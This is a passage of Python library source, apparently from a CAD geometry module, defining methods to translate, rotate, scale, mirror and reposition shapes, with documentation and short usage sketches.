New GEOM.GEOM_Object, containing the translated object.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.TranslateTwoPointsCopy(theObject, thePoint1, thePoint2)
RaiseIfFailed("TranslateTwoPointsCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "translated")
return anObj
## Translate the given object along the vector, specified by its components.
# @param theObject The object to be translated.
# @param theDX,theDY,theDZ Components of translation vector.
# @param theCopy Flag used to translate object itself or create a copy.
# @return Translated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the translated object if @a theCopy flag is @c True.
#
# @ref tui_translation "Example"
@ManageTransactions("TrsfOp")
def TranslateDXDYDZ(self, theObject, theDX, theDY, theDZ, theCopy=False):
"""
Translate the given object along the vector, specified by its components.
Parameters:
theObject The object to be translated.
theDX,theDY,theDZ Components of translation vector.
theCopy Flag used to translate object itself or create a copy.
Returns:
Translated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the translated object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
theDX, theDY, theDZ, Parameters = ParseParameters(theDX, theDY, theDZ)
if theCopy:
anObj = self.TrsfOp.TranslateDXDYDZCopy(theObject, theDX, theDY, theDZ)
else:
anObj = self.TrsfOp.TranslateDXDYDZ(theObject, theDX, theDY, theDZ)
anObj.SetParameters(Parameters)
RaiseIfFailed("TranslateDXDYDZ", self.TrsfOp)
return anObj
## Translate the given object along the vector, specified
# by its components, creating its copy before the translation.
# @param theObject The object to be translated.
# @param theDX,theDY,theDZ Components of translation vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the translated object.
#
# @ref tui_translation "Example"
@ManageTransactions("TrsfOp")
        def MakeTranslation(self, theObject, theDX, theDY, theDZ, theName=None):
"""
Translate the given object along the vector, specified
by its components, creating its copy before the translation.
Parameters:
theObject The object to be translated.
theDX,theDY,theDZ Components of translation vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the translated object.
"""
# Example: see GEOM_TestAll.py
theDX, theDY, theDZ, Parameters = ParseParameters(theDX, theDY, theDZ)
anObj = self.TrsfOp.TranslateDXDYDZCopy(theObject, theDX, theDY, theDZ)
anObj.SetParameters(Parameters)
RaiseIfFailed("TranslateDXDYDZ", self.TrsfOp)
self._autoPublish(anObj, theName, "translated")
return anObj
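        # Illustrative usage sketch (hypothetical names): translate a copy of a
        # box by the vector (10, 20, 30).
        #
        #   moved = geompy.MakeTranslation(box, 10., 20., 30., theName="moved")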
## Translate the given object along the given vector.
# @param theObject The object to be translated.
# @param theVector The translation vector.
# @param theCopy Flag used to translate object itself or create a copy.
# @return Translated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the translated object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def TranslateVector(self, theObject, theVector, theCopy=False):
"""
Translate the given object along the given vector.
Parameters:
theObject The object to be translated.
theVector The translation vector.
theCopy Flag used to translate object itself or create a copy.
Returns:
Translated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the translated object if theCopy flag is True.
"""
if theCopy:
anObj = self.TrsfOp.TranslateVectorCopy(theObject, theVector)
else:
anObj = self.TrsfOp.TranslateVector(theObject, theVector)
RaiseIfFailed("TranslateVector", self.TrsfOp)
return anObj
## Translate the given object along the given vector,
# creating its copy before the translation.
# @param theObject The object to be translated.
# @param theVector The translation vector.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the translated object.
#
# @ref tui_translation "Example"
@ManageTransactions("TrsfOp")
def MakeTranslationVector(self, theObject, theVector, theName=None):
"""
Translate the given object along the given vector,
creating its copy before the translation.
Parameters:
theObject The object to be translated.
theVector The translation vector.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the translated object.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.TranslateVectorCopy(theObject, theVector)
RaiseIfFailed("TranslateVectorCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "translated")
return anObj
## Translate the given object along the given vector on given distance.
# @param theObject The object to be translated.
# @param theVector The translation vector.
# @param theDistance The translation distance.
# @param theCopy Flag used to translate object itself or create a copy.
# @return Translated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the translated object if @a theCopy flag is @c True.
#
# @ref tui_translation "Example"
@ManageTransactions("TrsfOp")
def TranslateVectorDistance(self, theObject, theVector, theDistance, theCopy=False):
"""
Translate the given object along the given vector on given distance.
Parameters:
theObject The object to be translated.
theVector The translation vector.
theDistance The translation distance.
theCopy Flag used to translate object itself or create a copy.
Returns:
Translated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the translated object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
            theDistance, Parameters = ParseParameters(theDistance)
anObj = self.TrsfOp.TranslateVectorDistance(theObject, theVector, theDistance, theCopy)
RaiseIfFailed("TranslateVectorDistance", self.TrsfOp)
anObj.SetParameters(Parameters)
return anObj
## Translate the given object along the given vector on given distance,
# creating its copy before the translation.
# @param theObject The object to be translated.
# @param theVector The translation vector.
# @param theDistance The translation distance.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the translated object.
#
# @ref tui_translation "Example"
@ManageTransactions("TrsfOp")
def MakeTranslationVectorDistance(self, theObject, theVector, theDistance, theName=None):
"""
Translate the given object along the given vector on given distance,
creating its copy before the translation.
Parameters:
theObject The object to be translated.
theVector The translation vector.
theDistance The translation distance.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the translated object.
"""
# Example: see GEOM_TestAll.py
            theDistance, Parameters = ParseParameters(theDistance)
anObj = self.TrsfOp.TranslateVectorDistance(theObject, theVector, theDistance, 1)
RaiseIfFailed("TranslateVectorDistance", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "translated")
return anObj
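        # Illustrative usage sketch (hypothetical names): translate a copy of an
        # object along a direction by an explicit distance, independent of the
        # length of the direction vector itself.
        #
        #   v = geompy.MakeVectorDXDYDZ(1., 0., 0.)
        #   moved = geompy.MakeTranslationVectorDistance(box, v, 250., theName="moved")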
        ## Rotate the given object around the given axis by the given angle.
# @param theObject The object to be rotated.
# @param theAxis Rotation axis.
# @param theAngle Rotation angle in radians.
# @param theCopy Flag used to rotate object itself or create a copy.
#
# @return Rotated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the rotated object if @a theCopy flag is @c True.
#
# @ref tui_rotation "Example"
@ManageTransactions("TrsfOp")
def Rotate(self, theObject, theAxis, theAngle, theCopy=False):
"""
            Rotate the given object around the given axis by the given angle.
Parameters:
theObject The object to be rotated.
theAxis Rotation axis.
theAngle Rotation angle in radians.
theCopy Flag used to rotate object itself or create a copy.
Returns:
Rotated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the rotated object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
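            # note: a string angle (a parametric value) is assumed to be given
            # in degrees and is converted to radians after parsing below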
flag = False
if isinstance(theAngle,str):
flag = True
theAngle, Parameters = ParseParameters(theAngle)
if flag:
theAngle = theAngle*math.pi/180.0
if theCopy:
anObj = self.TrsfOp.RotateCopy(theObject, theAxis, theAngle)
else:
anObj = self.TrsfOp.Rotate(theObject, theAxis, theAngle)
RaiseIfFailed("Rotate", self.TrsfOp)
anObj.SetParameters(Parameters)
return anObj
        ## Rotate the given object around the given axis
        #  by the given angle, creating its copy before the rotation.
# @param theObject The object to be rotated.
# @param theAxis Rotation axis.
# @param theAngle Rotation angle in radians.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the rotated object.
#
# @ref tui_rotation "Example"
@ManageTransactions("TrsfOp")
def MakeRotation(self, theObject, theAxis, theAngle, theName=None):
"""
            Rotate the given object around the given axis
            by the given angle, creating its copy before the rotation.
Parameters:
theObject The object to be rotated.
theAxis Rotation axis.
theAngle Rotation angle in radians.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the rotated object.
"""
# Example: see GEOM_TestAll.py
flag = False
if isinstance(theAngle,str):
flag = True
theAngle, Parameters = ParseParameters(theAngle)
if flag:
theAngle = theAngle*math.pi/180.0
anObj = self.TrsfOp.RotateCopy(theObject, theAxis, theAngle)
RaiseIfFailed("RotateCopy", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "rotated")
return anObj
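        # Illustrative usage sketch (hypothetical names): rotate a copy of a box
        # by 45 degrees around the OZ axis (the angle is passed in radians).
        #
        #   import math
        #   axis = geompy.MakeVectorDXDYDZ(0., 0., 1.)
        #   rotated = geompy.MakeRotation(box, axis, 45. * math.pi / 180., theName="rotated")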
        ## Rotate the given object around the vector perpendicular to the plane
        #  containing three points.
        #  @param theObject The object to be rotated.
        #  @param theCentPoint central point of the rotation axis; the axis is the
        #                      vector perpendicular to the plane containing the three points.
        #  @param thePoint1,thePoint2 points lying in the plane perpendicular to the axis,
        #                      defining the rotation angle.
# @param theCopy Flag used to rotate object itself or create a copy.
# @return Rotated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the rotated object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def RotateThreePoints(self, theObject, theCentPoint, thePoint1, thePoint2, theCopy=False):
"""
            Rotate the given object around the vector perpendicular to the plane
            containing three points.
            Parameters:
                theObject The object to be rotated.
                theCentPoint central point of the rotation axis; the axis is the
                             vector perpendicular to the plane containing the three points.
                thePoint1,thePoint2 points lying in the plane perpendicular to the axis,
                             defining the rotation angle.
theCopy Flag used to rotate object itself or create a copy.
Returns:
Rotated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the rotated object if theCopy flag is True.
"""
if theCopy:
anObj = self.TrsfOp.RotateThreePointsCopy(theObject, theCentPoint, thePoint1, thePoint2)
else:
anObj = self.TrsfOp.RotateThreePoints(theObject, theCentPoint, thePoint1, thePoint2)
RaiseIfFailed("RotateThreePoints", self.TrsfOp)
return anObj
        ## Rotate the given object around the vector perpendicular to the plane
        #  containing three points, creating its copy before the rotation.
        #  @param theObject The object to be rotated.
        #  @param theCentPoint central point of the rotation axis; the axis is the
        #                      vector perpendicular to the plane containing the three points.
        #  @param thePoint1,thePoint2 points lying in the plane perpendicular to the axis,
        #                      defining the rotation angle.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the rotated object.
#
# @ref tui_rotation "Example"
@ManageTransactions("TrsfOp")
def MakeRotationThreePoints(self, theObject, theCentPoint, thePoint1, thePoint2, theName=None):
"""
            Rotate the given object around the vector perpendicular to the plane
            containing three points, creating its copy before the rotation.
            Parameters:
                theObject The object to be rotated.
                theCentPoint central point of the rotation axis; the axis is the
                             vector perpendicular to the plane containing the three points.
                thePoint1,thePoint2 points lying in the plane perpendicular to the axis,
                             defining the rotation angle.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the rotated object.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.RotateThreePointsCopy(theObject, theCentPoint, thePoint1, thePoint2)
RaiseIfFailed("RotateThreePointsCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "rotated")
return anObj
## Scale the given object by the specified factor.
# @param theObject The object to be scaled.
# @param thePoint Center point for scaling.
        #         Passing None for it means scaling relative to the origin of the global CS.
# @param theFactor Scaling factor value.
# @param theCopy Flag used to scale object itself or create a copy.
# @return Scaled @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the scaled object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def Scale(self, theObject, thePoint, theFactor, theCopy=False):
"""
Scale the given object by the specified factor.
Parameters:
theObject The object to be scaled.
thePoint Center point for scaling.
                          Passing None for it means scaling relative to the origin of the global CS.
theFactor Scaling factor value.
theCopy Flag used to scale object itself or create a copy.
Returns:
Scaled theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the scaled object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
theFactor, Parameters = ParseParameters(theFactor)
if theCopy:
anObj = self.TrsfOp.ScaleShapeCopy(theObject, thePoint, theFactor)
else:
anObj = self.TrsfOp.ScaleShape(theObject, thePoint, theFactor)
RaiseIfFailed("Scale", self.TrsfOp)
anObj.SetParameters(Parameters)
return anObj
## Scale the given object by the factor, creating its copy before the scaling.
# @param theObject The object to be scaled.
# @param thePoint Center point for scaling.
        #         Passing None for it means scaling relative to the origin of the global CS.
# @param theFactor Scaling factor value.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the scaled shape.
#
# @ref tui_scale "Example"
@ManageTransactions("TrsfOp")
def MakeScaleTransform(self, theObject, thePoint, theFactor, theName=None):
"""
Scale the given object by the factor, creating its copy before the scaling.
Parameters:
theObject The object to be scaled.
thePoint Center point for scaling.
                          Passing None for it means scaling relative to the origin of the global CS.
theFactor Scaling factor value.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the scaled shape.
"""
# Example: see GEOM_TestAll.py
theFactor, Parameters = ParseParameters(theFactor)
anObj = self.TrsfOp.ScaleShapeCopy(theObject, thePoint, theFactor)
RaiseIfFailed("ScaleShapeCopy", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "scaled")
return anObj
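        # Illustrative usage sketch (hypothetical names): scale a copy of a box
        # by a factor of 2 about the origin (None selects the global CS origin).
        #
        #   scaled = geompy.MakeScaleTransform(box, None, 2., theName="scaled")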
## Scale the given object by different factors along coordinate axes.
# @param theObject The object to be scaled.
# @param thePoint Center point for scaling.
        #         Passing None for it means scaling relative to the origin of the global CS.
# @param theFactorX,theFactorY,theFactorZ Scaling factors along each axis.
# @param theCopy Flag used to scale object itself or create a copy.
# @return Scaled @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the scaled object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def ScaleAlongAxes(self, theObject, thePoint, theFactorX, theFactorY, theFactorZ, theCopy=False):
"""
Scale the given object by different factors along coordinate axes.
Parameters:
theObject The object to be scaled.
thePoint Center point for scaling.
                          Passing None for it means scaling relative to the origin of the global CS.
theFactorX,theFactorY,theFactorZ Scaling factors along each axis.
theCopy Flag used to scale object itself or create a copy.
Returns:
Scaled theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the scaled object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
theFactorX, theFactorY, theFactorZ, Parameters = ParseParameters(theFactorX, theFactorY, theFactorZ)
if theCopy:
anObj = self.TrsfOp.ScaleShapeAlongAxesCopy(theObject, thePoint,
theFactorX, theFactorY, theFactorZ)
else:
anObj = self.TrsfOp.ScaleShapeAlongAxes(theObject, thePoint,
theFactorX, theFactorY, theFactorZ)
RaiseIfFailed("ScaleAlongAxes", self.TrsfOp)
anObj.SetParameters(Parameters)
return anObj
## Scale the given object by different factors along coordinate axes,
# creating its copy before the scaling.
# @param theObject The object to be scaled.
# @param thePoint Center point for scaling.
        #         Passing None for it means scaling relative to the origin of the global CS.
# @param theFactorX,theFactorY,theFactorZ Scaling factors along each axis.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the scaled shape.
#
# @ref swig_scale "Example"
@ManageTransactions("TrsfOp")
def MakeScaleAlongAxes(self, theObject, thePoint, theFactorX, theFactorY, theFactorZ, theName=None):
"""
Scale the given object by different factors along coordinate axes,
creating its copy before the scaling.
Parameters:
theObject The object to be scaled.
thePoint Center point for scaling.
                          Passing None for it means scaling relative to the origin of the global CS.
theFactorX,theFactorY,theFactorZ Scaling factors along each axis.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the scaled shape.
"""
# Example: see GEOM_TestAll.py
theFactorX, theFactorY, theFactorZ, Parameters = ParseParameters(theFactorX, theFactorY, theFactorZ)
anObj = self.TrsfOp.ScaleShapeAlongAxesCopy(theObject, thePoint,
theFactorX, theFactorY, theFactorZ)
RaiseIfFailed("MakeScaleAlongAxes", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "scaled")
return anObj
        ## Mirror an object relative to the given plane.
# @param theObject The object to be mirrored.
# @param thePlane Plane of symmetry.
# @param theCopy Flag used to mirror object itself or create a copy.
# @return Mirrored @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the mirrored object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def MirrorByPlane(self, theObject, thePlane, theCopy=False):
"""
            Mirror an object relative to the given plane.
Parameters:
theObject The object to be mirrored.
thePlane Plane of symmetry.
theCopy Flag used to mirror object itself or create a copy.
Returns:
Mirrored theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the mirrored object if theCopy flag is True.
"""
if theCopy:
anObj = self.TrsfOp.MirrorPlaneCopy(theObject, thePlane)
else:
anObj = self.TrsfOp.MirrorPlane(theObject, thePlane)
RaiseIfFailed("MirrorByPlane", self.TrsfOp)
return anObj
        ## Create an object, symmetrical
        #  to the given one relative to the given plane.
# @param theObject The object to be mirrored.
# @param thePlane Plane of symmetry.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the mirrored shape.
#
# @ref tui_mirror "Example"
@ManageTransactions("TrsfOp")
def MakeMirrorByPlane(self, theObject, thePlane, theName=None):
"""
            Create an object, symmetrical to the given one relative to the given plane.
Parameters:
theObject The object to be mirrored.
thePlane Plane of symmetry.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the mirrored shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.MirrorPlaneCopy(theObject, thePlane)
RaiseIfFailed("MirrorPlaneCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "mirrored")
return anObj
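        # Illustrative usage sketch (hypothetical names): mirror a copy of a box
        # through the YZ plane.
        #
        #   p = geompy.MakeVertex(0., 0., 0.)
        #   v = geompy.MakeVectorDXDYDZ(1., 0., 0.)
        #   plane = geompy.MakePlane(p, v, 300.)
        #   mirrored = geompy.MakeMirrorByPlane(box, plane, theName="mirrored")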
        ## Mirror an object relative to the given axis.
# @param theObject The object to be mirrored.
# @param theAxis Axis of symmetry.
# @param theCopy Flag used to mirror object itself or create a copy.
# @return Mirrored @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the mirrored object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def MirrorByAxis(self, theObject, theAxis, theCopy=False):
"""
            Mirror an object relative to the given axis.
Parameters:
theObject The object to be mirrored.
theAxis Axis of symmetry.
theCopy Flag used to mirror object itself or create a copy.
Returns:
Mirrored theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the mirrored object if theCopy flag is True.
"""
if theCopy:
anObj = self.TrsfOp.MirrorAxisCopy(theObject, theAxis)
else:
anObj = self.TrsfOp.MirrorAxis(theObject, theAxis)
RaiseIfFailed("MirrorByAxis", self.TrsfOp)
return anObj
        ## Create an object, symmetrical
        #  to the given one relative to the given axis.
# @param theObject The object to be mirrored.
# @param theAxis Axis of symmetry.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the mirrored shape.
#
# @ref tui_mirror "Example"
@ManageTransactions("TrsfOp")
def MakeMirrorByAxis(self, theObject, theAxis, theName=None):
"""
            Create an object, symmetrical to the given one relative to the given axis.
Parameters:
theObject The object to be mirrored.
theAxis Axis of symmetry.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the mirrored shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.MirrorAxisCopy(theObject, theAxis)
RaiseIfFailed("MirrorAxisCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "mirrored")
return anObj
## Mirror an object relative to the given point.
# @param theObject The object to be mirrored.
# @param thePoint Point of symmetry.
# @param theCopy Flag used to mirror object itself or create a copy.
# @return Mirrored @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the mirrored object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def MirrorByPoint(self, theObject, thePoint, theCopy=False):
"""
Mirror an object relative to the given point.
Parameters:
theObject The object to be mirrored.
thePoint Point of symmetry.
theCopy Flag used to mirror object itself or create a copy.
Returns:
Mirrored theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the mirrored object if theCopy flag is True.
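Example of usage (a minimal sketch; 'box' is assumed to be an existing shape):
p = geompy.MakeVertex(50, 50, 50)
# mirror the object in place (no copy is created)
geompy.MirrorByPoint(box, p)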
"""
# Example: see GEOM_TestAll.py
if theCopy:
anObj = self.TrsfOp.MirrorPointCopy(theObject, thePoint)
else:
anObj = self.TrsfOp.MirrorPoint(theObject, thePoint)
RaiseIfFailed("MirrorByPoint", self.TrsfOp)
return anObj
## Create an object, symmetrical
# to the given one relative to the given point.
# @param theObject The object to be mirrored.
# @param thePoint Point of symmetry.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the mirrored shape.
#
# @ref tui_mirror "Example"
@ManageTransactions("TrsfOp")
def MakeMirrorByPoint(self, theObject, thePoint, theName=None):
"""
Create an object, symmetrical to the given one relative to the given point.
Parameters:
theObject The object to be mirrored.
thePoint Point of symmetry.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the mirrored shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.MirrorPointCopy(theObject, thePoint)
RaiseIfFailed("MirrorPointCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "mirrored")
return anObj
## Modify the location of the given object.
# @param theObject The object to be displaced.
# @param theStartLCS Coordinate system to perform displacement from it.\n
# If \a theStartLCS is NULL, displacement
# will be performed from global CS.\n
# If \a theObject itself is used as \a theStartLCS,
# its location will be changed to \a theEndLCS.
# @param theEndLCS Coordinate system to perform displacement to it.
# @param theCopy Flag used to displace object itself or create a copy.
# @return Displaced @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the displaced object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def Position(self, theObject, theStartLCS, theEndLCS, theCopy=False):
"""
Modify the location of the given object by LCS.
Parameters:
theObject The object to be displaced.
theStartLCS Coordinate system to perform displacement from it.
If theStartLCS is NULL, displacement
will be performed from global CS.
If theObject itself is used as theStartLCS,
its location will be changed to theEndLCS.
theEndLCS Coordinate system to perform displacement to it.
theCopy Flag used to displace object itself or create a copy.
Returns:
Displaced theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the displaced object if theCopy flag is True.
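Example of usage (a minimal sketch; 'cylinder' is assumed to be an existing shape):
cs1 = geompy.MakeMarker( 0, 0, 0, 1,0,0, 0,1,0)
cs2 = geompy.MakeMarker(30,40,40, 1,0,0, 0,1,0)
# displace the object itself, without creating a copy
geompy.Position(cylinder, cs1, cs2, theCopy=False)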
"""
# Example: see GEOM_TestAll.py
if theCopy:
anObj = self.TrsfOp.PositionShapeCopy(theObject, theStartLCS, theEndLCS)
else:
anObj = self.TrsfOp.PositionShape(theObject, theStartLCS, theEndLCS)
RaiseIfFailed("Displace", self.TrsfOp)
return anObj
## Modify the Location of the given object by LCS,
# creating its copy before the setting.
# @param theObject The object to be displaced.
# @param theStartLCS Coordinate system to perform displacement from it.\n
# If \a theStartLCS is NULL, displacement
# will be performed from global CS.\n
# If \a theObject itself is used as \a theStartLCS,
# its location will be changed to \a theEndLCS.
# @param theEndLCS Coordinate system to perform displacement to it.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the displaced shape.
#
# @ref tui_modify_location "Example"
@ManageTransactions("TrsfOp")
def MakePosition(self, theObject, theStartLCS, theEndLCS, theName=None):
"""
Modify the Location of the given object by LCS, creating its copy before the setting.
Parameters:
theObject The object to be displaced.
theStartLCS Coordinate system to perform displacement from it.
If theStartLCS is NULL, displacement
will be performed from global CS.
If theObject itself is used as theStartLCS,
its location will be changed to theEndLCS.
theEndLCS Coordinate system to perform displacement to it.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the displaced shape.
Example of usage:
# create local coordinate systems
cs1 = geompy.MakeMarker( 0, 0, 0, 1,0,0, 0,1,0)
cs2 = geompy.MakeMarker(30,40,40, 1,0,0, 0,1,0)
# modify the location of the given object
position = geompy.MakePosition(cylinder, cs1, cs2)
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.PositionShapeCopy(theObject, theStartLCS, theEndLCS)
RaiseIfFailed("PositionShapeCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "displaced")
return anObj
## Modify the Location of the given object by Path.
# @param theObject The object to be displaced.
# @param thePath Wire or Edge along that the object will be translated.
# @param theDistance progress of Path (0 = start location, 1 = end of path location).
# @param theCopy Flag used to displace the object itself or create a copy.
# @param theReverse 0 - for usual direction, 1 - to reverse path direction.
# @return Displaced @a theObject (GEOM.GEOM_Object) if @a theCopy is @c False or
# new GEOM.GEOM_Object, containing the displaced shape if @a theCopy is @c True.
#
# @ref tui_modify_location "Example"
@ManageTransactions("TrsfOp")
def PositionAlongPath(self,theObject, thePath, theDistance, theCopy, theReverse):
"""
Modify the Location of the given object by Path.
Parameters:
theObject The object to be displaced.
thePath Wire or Edge along that the object will be translated.
theDistance progress of Path (0 = start location, 1 = end of path location).
theCopy Flag used to displace the object itself or create a copy.
theReverse 0 - for usual direction, 1 - to reverse path direction.
Returns:
Displaced theObject (GEOM.GEOM_Object) if theCopy is False or
new GEOM.GEOM_Object, containing the displaced shape if theCopy is True.
Example of usage:
position = geompy.PositionAlongPath(cylinder, circle, 0.75, 1, 1)
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.PositionAlongPath(theObject, thePath, theDistance, theCopy, theReverse)
RaiseIfFailed("PositionAlongPath", self.TrsfOp)
return anObj
## Modify the Location of the given object by Path, creating its copy before the operation.
# @param theObject The object to be displaced.
# @param thePath Wire or Edge along that the object will be translated.
# @param theDistance progress of Path (0 = start location, 1 = end of path location).
# @param theReverse 0 - for usual direction, 1 - to reverse path direction.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the displaced shape.
@ManageTransactions("TrsfOp")
def MakePositionAlongPath(self, theObject, thePath, theDistance, theReverse, theName=None):
"""
Modify the Location of the given object by Path, creating its copy before the operation.
Parameters:
theObject The object to be displaced.
thePath Wire or Edge along that the object will be translated.
theDistance progress of Path (0 = start location, 1 = end of path location).
theReverse 0 - for usual direction, 1 - to reverse path direction.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the displaced shape.
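Example of usage (a minimal sketch; 'cylinder' and 'circle' are assumed to exist):
# place a copy of the cylinder at three quarters of the path, usual direction
position = geompy.MakePositionAlongPath(cylinder, circle, 0.75, 0)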
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.PositionAlongPath(theObject, thePath, theDistance, 1, theReverse)
RaiseIfFailed("PositionAlongPath", self.TrsfOp)
self._autoPublish(anObj, theName, "displaced")
return anObj
## Offset the given shape.
# @param theObject The base object for the offset.
# @param theOffset Offset value.
# @param theCopy Flag used to offset object itself or create a copy.
# @return Modified @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
